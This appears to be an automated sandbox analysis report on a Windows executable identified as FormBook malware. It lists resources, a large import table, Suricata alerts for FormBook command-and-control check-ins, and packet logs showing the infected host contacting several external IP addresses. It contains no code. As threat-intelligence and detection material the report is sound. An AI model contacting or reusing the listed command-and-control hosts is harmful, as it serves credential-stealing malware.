RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x60126	data			1.0003329013239817
RT_GROUP_ICON	0x1308e0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x130958	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x13096c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x130980	0x14	data	English	Great Britain	1.25
RT_VERSION	0x130994	0x10c	data	English	Great Britain	0.5932835820895522
RT_MANIFEST	0x130aa0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-12T05:15:56.156882+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49764	80	192.168.2.4	213.145.228.16
2024-08-12T05:14:25.278013+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49747	80	192.168.2.4	208.91.197.27
2024-08-12T05:14:43.637779+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49749	80	192.168.2.4	43.252.167.188
2024-08-12T05:15:49.902471+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49763	80	192.168.2.4	199.192.19.19
2024-08-12T05:16:23.205204+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49772	80	192.168.2.4	194.58.112.174
2024-08-12T05:15:14.267045+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49758	80	192.168.2.4	23.251.54.212
2024-08-12T05:13:46.967798+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49739	80	192.168.2.4	217.160.0.106
2024-08-12T05:15:42.288965+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49760	80	192.168.2.4	199.192.19.19
2024-08-12T05:12:53.078148+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49779	80	192.168.2.4	104.21.45.56
2024-08-12T05:15:11.733973+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49757	80	192.168.2.4	23.251.54.212
2024-08-12T05:16:17.398800+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49771	80	192.168.2.4	91.195.240.19
2024-08-12T05:16:14.936864+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49770	80	192.168.2.4	91.195.240.19
2024-08-12T05:13:52.142938+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49741	80	192.168.2.4	217.160.0.106
2024-08-12T05:16:39.937120+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49777	80	192.168.2.4	104.21.45.56
2024-08-12T05:14:54.456190+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49752	80	192.168.2.4	194.9.94.85
2024-08-12T05:16:25.748333+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49773	80	192.168.2.4	194.58.112.174
2024-08-12T05:15:47.365213+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49762	80	192.168.2.4	199.192.19.19
2024-08-12T05:14:48.710219+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49751	80	192.168.2.4	43.252.167.188
2024-08-12T05:16:42.469573+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49778	80	192.168.2.4	104.21.45.56
2024-08-12T05:16:04.076895+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49767	80	192.168.2.4	213.145.228.16
2024-08-12T05:14:16.660530+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49744	80	192.168.2.4	208.91.197.27
2024-08-12T05:15:02.090377+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49755	80	192.168.2.4	194.9.94.85
2024-08-12T05:14:21.740501+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49746	80	192.168.2.4	208.91.197.27
2024-08-12T05:14:19.207640+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49745	80	192.168.2.4	208.91.197.27
2024-08-12T05:15:58.646857+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49765	80	192.168.2.4	213.145.228.16
2024-08-12T05:15:36.645488+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49759	80	192.168.2.4	23.251.54.212
2024-08-12T05:14:46.413561+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49750	80	192.168.2.4	43.252.167.188
2024-08-12T05:16:28.296861+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49774	80	192.168.2.4	194.58.112.174
2024-08-12T05:14:56.999620+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49753	80	192.168.2.4	194.9.94.85
2024-08-12T05:16:12.321101+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49769	80	192.168.2.4	91.195.240.19
2024-08-12T05:14:41.119684+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49748	80	192.168.2.4	43.252.167.188
2024-08-12T05:13:54.608641+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49742	80	192.168.2.4	217.160.0.106
2024-08-12T05:16:30.835820+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49775	80	192.168.2.4	194.58.112.174
2024-08-12T05:16:37.390178+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49776	80	192.168.2.4	104.21.45.56
2024-08-12T05:15:09.208803+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49756	80	192.168.2.4	23.251.54.212
2024-08-12T05:13:30.987934+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49738	80	192.168.2.4	5.44.111.162
2024-08-12T05:16:09.779223+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49768	80	192.168.2.4	91.195.240.19
2024-08-12T05:14:59.550719+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49754	80	192.168.2.4	194.9.94.85
2024-08-12T05:13:49.494279+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49740	80	192.168.2.4	217.160.0.106
2024-08-12T05:16:01.197323+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49766	80	192.168.2.4	213.145.228.16
2024-08-12T05:15:44.839054+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49761	80	192.168.2.4	199.192.19.19

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 12, 2024 05:13:30.321500063 CEST	49738	80	192.168.2.4	5.44.111.162
Aug 12, 2024 05:13:30.326637983 CEST	80	49738	5.44.111.162	192.168.2.4
Aug 12, 2024 05:13:30.326867104 CEST	49738	80	192.168.2.4	5.44.111.162
Aug 12, 2024 05:13:30.329245090 CEST	49738	80	192.168.2.4	5.44.111.162
Aug 12, 2024 05:13:30.334448099 CEST	80	49738	5.44.111.162	192.168.2.4
Aug 12, 2024 05:13:30.987478018 CEST	80	49738	5.44.111.162	192.168.2.4
Aug 12, 2024 05:13:30.987756014 CEST	80	49738	5.44.111.162	192.168.2.4
Aug 12, 2024 05:13:30.987934113 CEST	49738	80	192.168.2.4	5.44.111.162
Aug 12, 2024 05:13:30.992031097 CEST	49738	80	192.168.2.4	5.44.111.162
Aug 12, 2024 05:13:30.997078896 CEST	80	49738	5.44.111.162	192.168.2.4
Aug 12, 2024 05:13:46.318214893 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:46.323235035 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:46.323458910 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:46.325484991 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:46.330564022 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:46.967302084 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:46.967514038 CEST	80	49739	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:46.967797995 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:47.827969074 CEST	49739	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:48.847737074 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:48.853099108 CEST	80	49740	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:48.853334904 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:48.856378078 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:48.861386061 CEST	80	49740	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:49.493937016 CEST	80	49740	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:49.494103909 CEST	80	49740	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:49.494278908 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:50.359200954 CEST	49740	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:51.379761934 CEST	49741	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:51.385121107 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:51.385339975 CEST	49741	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:51.388668060 CEST	49741	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:51.393821001 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:51.393851042 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:51.393878937 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:51.393909931 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:51.393938065 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:51.393985987 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:51.394015074 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:51.394041061 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:51.394232035 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:52.142559052 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:52.142712116 CEST	80	49741	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:52.142937899 CEST	49741	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:52.890465975 CEST	49741	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:53.943352938 CEST	49742	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:53.948518038 CEST	80	49742	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:53.948626995 CEST	49742	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:53.964392900 CEST	49742	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:53.969794989 CEST	80	49742	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:54.608198881 CEST	80	49742	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:54.608438015 CEST	80	49742	217.160.0.106	192.168.2.4
Aug 12, 2024 05:13:54.608640909 CEST	49742	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:54.613209963 CEST	49742	80	192.168.2.4	217.160.0.106
Aug 12, 2024 05:13:54.618283987 CEST	80	49742	217.160.0.106	192.168.2.4
Aug 12, 2024 05:14:16.205729961 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:16.210832119 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:16.210952997 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:16.213109970 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:16.218086004 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:16.660264969 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:16.660530090 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:17.722182035 CEST	49744	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:17.727559090 CEST	80	49744	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:18.742513895 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:18.747674942 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:18.747879982 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:18.749522924 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:18.754420996 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:19.207120895 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:19.207639933 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:20.265353918 CEST	49745	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:20.270575047 CEST	80	49745	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.284190893 CEST	49746	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:21.289638042 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.289725065 CEST	49746	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:21.291794062 CEST	49746	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:21.296895027 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.296955109 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.296983957 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.297013044 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.297039032 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.297214031 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.297240973 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.297274113 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.297300100 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.740432978 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:21.740500927 CEST	49746	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:22.797768116 CEST	49746	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:22.802932978 CEST	80	49746	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:23.816530943 CEST	49747	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:23.821928978 CEST	80	49747	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:23.822139025 CEST	49747	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:23.824186087 CEST	49747	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:23.829262972 CEST	80	49747	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:25.277790070 CEST	80	49747	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:25.277841091 CEST	80	49747	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:25.277877092 CEST	80	49747	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:25.277923107 CEST	80	49747	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:25.277952909 CEST	80	49747	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:25.278012991 CEST	49747	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:25.278012991 CEST	49747	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:25.278012991 CEST	49747	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:25.282165051 CEST	49747	80	192.168.2.4	208.91.197.27
Aug 12, 2024 05:14:25.287290096 CEST	80	49747	208.91.197.27	192.168.2.4
Aug 12, 2024 05:14:40.237220049 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:40.242378950 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:40.242475986 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:40.244437933 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:40.249604940 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:41.119555950 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:41.119601965 CEST	80	49748	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:41.119683981 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:41.749447107 CEST	49748	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:42.769109011 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:42.774430990 CEST	80	49749	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:42.774512053 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:42.776278019 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:42.781428099 CEST	80	49749	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:43.637432098 CEST	80	49749	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:43.637537956 CEST	80	49749	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:43.637778997 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:44.280702114 CEST	49749	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:45.301139116 CEST	49750	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:45.306482077 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:45.306570053 CEST	49750	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:45.309333086 CEST	49750	80	192.168.2.4	43.252.167.188
Aug 12, 2024 05:14:45.314368010 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:45.314397097 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:45.314445972 CEST	80	49750	43.252.167.188	192.168.2.4
Aug 12, 2024 05:14:45.314471006 CEST	80	49750	43.252.167.188	192.168.2.4
